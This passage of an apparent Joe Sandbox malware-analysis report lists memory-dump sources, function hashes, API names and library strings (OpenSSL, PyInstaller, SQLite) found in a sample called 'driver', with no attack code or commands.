                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: $%!.15g$-
                                                                                                                                                                                                                                                • API String ID: 22509725-875264902
                                                                                                                                                                                                                                                • Opcode ID: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
                                                                                                                                                                                                                                                • Instruction ID: af810600024a84f9f4a9e0e60dc85cdf7430a9d99424c808c0543feb027f0b03
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44e7bfd73146257976c8babe6df8ad74685d0057028d93717c232ee9119ed487
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF414562E1E78496FB10CB2EE004BAABBA0EB597C0F005135EE8E07796CB3CD005C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007A8114
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                                • API String ID: 64304817-1778748169
                                                                                                                                                                                                                                                • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                • Instruction ID: 0d5c0607a8ed3aef549fd7895b44754f83dcd5701e36a13ee26d7389e0d7520a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F414121A0BA83A8FE54AF51955477872D0EF61FD4F180234DD6D0BBD9DF3CA4618638
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF6A29B352C,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B7F22
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                                • Instruction ID: 7e4cf7fcca1263ab1e9796fc657e1b1d4af76f9d141fe1bea4070a68a309b58f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131C42265AAC145EB219B22E8507EA6354EF84FE8F441331EE6D877CBDFACD6019700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction ID: 43608e3a7d71fbba694d0bce4705e405c754ceeee61d327d24f3a54586d0a28a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57219F62B09B4186E6109B66F4447EA63A4FB88B88F400136EE8D9365BDE7CE645D740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction ID: cfa19f61f0802f777e62fdf0d77e5a8d80f18a55cbfcfb7aa0afd87f2970415e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7D10672B19A818EE710CF66D4442AC3BB1FB44F9CB448235DE5E97B9ADE78E006D340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 22509725-0
                                                                                                                                                                                                                                                • Opcode ID: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
                                                                                                                                                                                                                                                • Instruction ID: 98f092d95dff559eaf192feb61944a45dfc8a266beecbe82b28f60aa5b584708
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c805bd562258d8df5866e84e3d87bde111353fec1875c4e7c43f0334e34767cb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C91D371A0BB46A6FAA49F1691482797F94FB44BE0F486234DE6D077C5EF3CE4108728
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD0EC
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29CCFBB), ref: 00007FF6A29CD177
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction ID: 522a9567aabdbeb78e2da34d8e5744d7ad4773fd4d8039c6315a57bc8951ac28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6291D332F5A65289F754DF6694402BD2BA0BB44F8CF144139DE0E97B8ACEB8F452E710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 22509725-0
                                                                                                                                                                                                                                                • Opcode ID: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
                                                                                                                                                                                                                                                • Instruction ID: 2b39ed67ace99152adffe4ede80bade336e7c3c0ce98d629fc7a22a145ee3bc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2db2c3c66d5ac1fca2ba80e9efd88c0aaff962aced3a1b146ac441fe06bb1eef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB21CE62B0A74297E6249B1AB5490BAB3A1FB44BC4F042131DBCE47F56CF3CE050C314
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction ID: 6ffdb0cf0d0221358e9fe882391256db85e4156b394c2f554441733715bd3c2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5110821F4D14282F654876BE5442BA5292EF98F88F888030DB4D87B8FCDBDE4C1B200
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                                • Instruction ID: 33cb09135e44f660749d2e44278a44297bf1868f00aad6330e10399435591a66
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6113322B15F0199EF40CF60E8542B933A4FB19798F440E31DA5D86794EF78D5B88354
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                                • Instruction ID: 41877da23c691756722807e8729d9cfdf5c254a80d957d8ee69900fc3e724515
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C111826B16B019AFB008F70E8556A833A4FB197A8F440A31DA6D467A4EF78D1688344
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction ID: ca73135a5ee42049fd0ae0ae2ebb798455ef37b71fe5550840e41bc44283277c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF114836B59B068AFB00CB61E8542B933A4FB19B58F040E35DA6D867A9DFB8D1549340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                • API String ID: 22509725-2410398255
                                                                                                                                                                                                                                                • Opcode ID: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
                                                                                                                                                                                                                                                • Instruction ID: 1376e50694f6ecdca36b2f1247cdf7ca32d4d077220f1ebcac3e2aca4c9828ac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5081886879a1dcb09f1a8e8b481931c42fe165402a51258c3fdd95875b174ecb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15C1E262F0A642A2FB249A25D58827C6BE0EF11BC4F046436CB4E577D5FF2CE4528338
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C61208
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                                                • API String ID: 3535234312-384499812
                                                                                                                                                                                                                                                • Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                                • Instruction ID: f7cae5e61294facad540732b8d8fdf0bd5f9573e3f430214f7eb307cc3398514
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CD14922A0AB82A6EF589F25D4902BD27A4FB44BC4F489035CE4D4B7D5DF38E560C738
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
